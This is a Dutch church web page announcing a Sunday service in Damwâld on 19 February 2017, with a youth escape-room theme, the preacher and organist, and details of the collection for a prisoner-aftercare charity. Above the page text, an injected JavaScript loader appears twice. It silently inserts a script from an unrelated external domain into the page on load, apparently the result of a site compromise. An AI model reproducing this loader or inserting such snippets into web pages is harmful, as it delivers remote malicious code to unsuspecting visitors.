;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 19 februari 2017 14:00 uur - PKN Damwâld
zondag 19 februari 2017
14:00 uur

Kerkdienst zondag 19 februari 2017 14:00 uur

Thema: Terugkijken mysterie activiteit jongeren

De jongeren hebben 21 januari een mysterie activiteit gehad. Hierbij werden ze opgesloten in escape rooms en moesten ze binnen een uur ontsnappen! Tijdens de dienst wordt verder ingaan op dit activiteit en worden er onder andere foto’s en filmpjes getoond! Wees erbij en herbeleef de Escape room!

Lees hier het nieuwsbericht over het activiteit

Informatie

Voorganger:Ds. S. Boukes
Organist:Jelte
Thema:Terugkijken mysterie activiteit jongeren
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: Gevangenzorg Nederland

Gevangenenzorg Nederland is een Christelijke vrijwilligersorganisatie. Vrijwilligers begeleiden de ex-gevangene en worden daarbij ondersteund door professionals vanuit kantoor. Meestal is het contact tussen vrijwilliger en ex-gedetineerde al tijdens detentie opgebouwd en is er daardoor al langere tijd contact waardoor er een vertrouwensband is ontstaan. De vrijwilliger heeft al tijdens detentie met de (ex-) gevangene gesproken over re-integratie na detentie en meegedacht op het gebied van wonen, relaties, financiën en werk of dagbesteding. De vrijwilliger bezoekt ook na detentie regelmatig de ex-gevangene en houdt contact over de ontwikkelingen op al deze gebieden. De vrijwilliger informeert de kantoorcollega's hierover zodat goede ondersteuning kan worden geboden en daarnaast indien nodig de vrijwilliger kan motiveren en adviseren. Gevangenenzorg blijft daarom, afhankelijk van de wens van alle partijen, ook na detentie nog een tijd betrokken.

Tweede collecte: Kerk
Uitganscollecte: Kerk